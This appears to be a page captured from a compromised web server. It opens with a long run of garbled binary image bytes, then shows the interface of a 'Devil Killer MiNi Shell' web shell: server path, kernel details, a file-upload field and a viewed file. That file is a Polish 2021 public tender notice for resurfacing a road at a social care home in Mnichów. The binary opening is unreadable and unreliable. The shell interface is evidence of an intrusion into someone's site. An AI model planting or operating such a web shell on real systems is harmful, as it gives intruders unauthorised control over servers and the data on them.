JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211020/0023863901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi wewnętrznej oraz zjazdów z drogi gminnej przy Domu Pomocy<br/>Społecznej w Mnichowie poprzez położenie masy bitumicznej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT JĘDRZEJOWSKI - DOM POMOCY SPOŁECZNEJ W MNICHOWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dom Pomocy Społecznej w Mnichowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009366</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 11 Listopada 83</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jędrzejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">413873512</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dpsmnichow@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpsmnichow.jedrzejow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi wewnętrznej oraz zjazdów z drogi gminnej przy Domu Pomocy<br/>Społecznej w Mnichowie poprzez położenie masy bitumicznej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-566495f0-2ff8-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00238639</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00016827/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa drogi wewnętrznej oraz zjazdów z drogi gminnej przy Domu Pomocy Społecznej w Mnichowie poprzez położenie masy bitumicznej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl , https://www.powiatjedrzejow.pl/bipkod/012/003/004/003 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl ,<br/>https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1 W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu<br/>https://mi niportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal<br/>2 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3 Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>4 Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5 Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6 Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji,<br/>oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na<br/>ePUAP.<br/>7 W postępowaniu o udzielenie zamówienia korespondencja (inna niż oferta Wykonawcy i załączniki do<br/>oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP<br/>oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za<br/>pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z<br/>niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>8 Przekazanie korespondencji w sposób opisany w ust. 7 wymaga obowiązkowego poinformowania<br/>Zamawiającego o przekazaniu wiadomości na adres e-mail wskazany w rozdziale I „Zamawiający”<br/>(niedopełnienie tego obowiązku uznane będzie jako nieskuteczne przekazanie dokumentów).<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail<br/>wskazanym w rozdziale I –„Zamawiającego” i „Prowadzącego postępowanie”<br/>9 Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail<br/>wskazany w ust. 8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>11. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1),<br/>dalej „RODO”, informuję, że:<br/>administratorem Pani/Pana danych osobowych jest Powiat Jędrzejowski, Dom Pomocy Społecznej w<br/>Mnichowie Inspektorem danych osobowych w Domu Pomocy Społecznej w Mnichowie jest<br/>Agnieszka Kisiel kontakt: adres e-mail: dpsmnichow. sekretariat @gmail.com (w temacie proszę<br/>wpisać IOD_DPS) telefon: 41 387 35 12 wewn. 10<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września<br/>2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.);<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia lub na okres przechowywania tych<br/>danych zgodnie z wytycznymi o dofinansowania z środków UE;<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym<br/>wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną<br/>Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio<br/>pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej<br/>jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego<br/>administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony<br/>danych osobowych.<br/>Pozostała część w dziale XXII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS III.263.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest przebudowa drogi wewnętrznej oraz zjazdów z drogi gminnej przy Domu Pomocy Społecznej w Mnichowie poprzez położenie masy bitumicznej<br/>Przewidywany zakres robót budowlanych:<br/>- przebudowa drogi wewnętrznej poprzez wykonanie nawierzchni bitumicznej<br/>- wykonanie utwardzenia pod kontener na śmieci<br/>- przebudowa zjazdów z drogi gminnej poprzez utwardzenie<br/>- wykonanie nawierzchni z kostki betonowej przed budynkiem głównym </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-08</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca poda cenę oferty w Formularzu Ofertowym sporządzonym<br/>według wzoru stanowiącego Załącznik Nr 1 do SWZ, jako cenę brutto [z uwzględnieniem kwoty<br/>podatku od towarów i usług (VAT)].<br/>2. Cenę ofertową, na podstawie której dokonany zostanie wybór najkorzystniejszej oferty – zgodnie z<br/>założonym kryterium oceny ofert – stanowi całkowite wynagrodzenie Wykonawcy jakie może on<br/>uzyskać z tytułu realizacji przedmiotowego zamówienia, przy czym obowiązującą formą wynagrodzenia<br/>za przedmiot umowy jest wynagrodzenie ryczałtowe w rozumieniu art. 632 Kodeksu cywilnego.<br/>3. Cena oferty jest ceną ryczałtową musi zawierać wszelkie koszty związane z wykonaniem przedmiotu<br/>zamówienia, wynikające wprost z opisu przedmiotu zamówienia jak również w nich nie ujęte, a bez<br/>których nie można wykonać zamówienia.<br/>4. Cena musi być wyrażona w złotych polskich (PLN), z dokładnością nie większą niż dwa miejsca po<br/>przecinku.<br/>5. Wykonawca poda w Formularzu Ofertowym stawkę podatku od towarów i usług (VAT) właściwą dla<br/>przedmiotu zamówienia, obowiązującą według stanu prawnego na dzień składania ofert. Określenie<br/>ceny ofertowej z zastosowaniem nieprawidłowej stawki podatku od towarów i usług (VAT)<br/>potraktowane będzie, jako błąd w obliczeniu ceny i spowoduje odrzucenie oferty,<br/>jeżeli nie ziszczą się ustawowe przesłanki omyłki (na podstawie art. 226 ust. 1 pkt 10 pzp w związku z<br/>art. 223 ust. 2 pkt 3 pzp). W przypadku zastosowania stawki obniżonej lub zwolnionej należy podać<br/>podstawę prawną.<br/>6. Cena ofertowa musi być jednoznaczna i ostateczna. Zostanie wprowadzona do umowy jako<br/>obowiązujące strony wynagrodzenie ryczałtowe niezmienne przez okres realizacji zadania.<br/>7. Cenę ofertową należy wyliczyć według kalkulacji własnej. Cena ofertowa powinna obejmować<br/>kompletne wykonanie przedmiotu zamówienia określonego w niniejszej SWZ.<br/>8. Wykonawca powinien wziąć pod uwagę, że kwoty wyliczone przez niego stanowią zapłatę za prace<br/>wykonaną i zakończoną pod każdym względem. Uważa się, że Wykonawca wziął pod uwagę wszystkie<br/>wymagania i zobowiązania, bez względu na to czy zostały określone czy zasugerowane, zawarte we<br/>wszystkich częściach niniejszej SWZ i Projekcie umowy. Mając na uwadze powyższe, kwota winna<br/>zawierać wszystkie nieprzewidziane wydatki oraz różnorakie<br/>ryzyko związane z koniecznością wykonania całości prac objętych Umową.<br/>9. Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich (PLN).<br/>10. Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku<br/>podatkowego zgodnie z przepisami o podatku od towarów i usług, zamawiający w celu oceny takiej<br/>oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek<br/>rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, informuje Zamawiającego, czy<br/>wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego, wskazując<br/>nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie<br/>będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku. Brak takowej<br/>informacji oznaczać będzie, iż wybór oferty NIE BĘDZIE prowadzić do powstania u Zamawiającego<br/>obowiązku podatkowego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy (dotyczy wszystkich części<br/>zamówienia):<br/>1) nie podlegają wykluczeniu na podstawie pkt VI SWZ,<br/>2) spełniają określone przez Zamawiającego warunki udziału w postępowaniu w zakresie:<br/>a) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w tym<br/>zakresie;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów: Zamawiający nie stawia warunku w tym zakresie;<br/>c) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w tym zakresie;<br/>d) zdolności technicznej lub zawodowej:<br/>- wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, zrealizował lub realizuje (przy czym w tym<br/>przypadku będzie liczona wartość zrealizowanej części umowy) co najmniej jedną robotę<br/>polegającą na budowie, przebudowie lub remoncie drogi o wartości nie mniejszej niż 200 000,00<br/>zł brutto (słownie: dwieście tysięcy zł 00/100 zł).<br/>- wykaże, że dysponuje lub będzie dysponował co najmniej:<br/>- jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia, która pełnić będzie funkcję<br/>kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności drogowej bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. Dz. U. z 2020 poz.1333 ze zm.) i rozporządzenia Ministra Infrastruktury i<br/>Rozwoju z dnia 29 kwietnia 2019 r.w sprawie samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im zakresem uprawnienia, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów<br/>obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>uznanych<br/>przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(t.j.Dz.U.2020.220 z późn. zm.), lub zamierzającymi świadczyć usługi transgraniczne w<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j.Dz.U.2019.1117) w<br/>specjalności drogowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>podmiotowych środków dowodowych:<br/>1) Spełnianie warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia 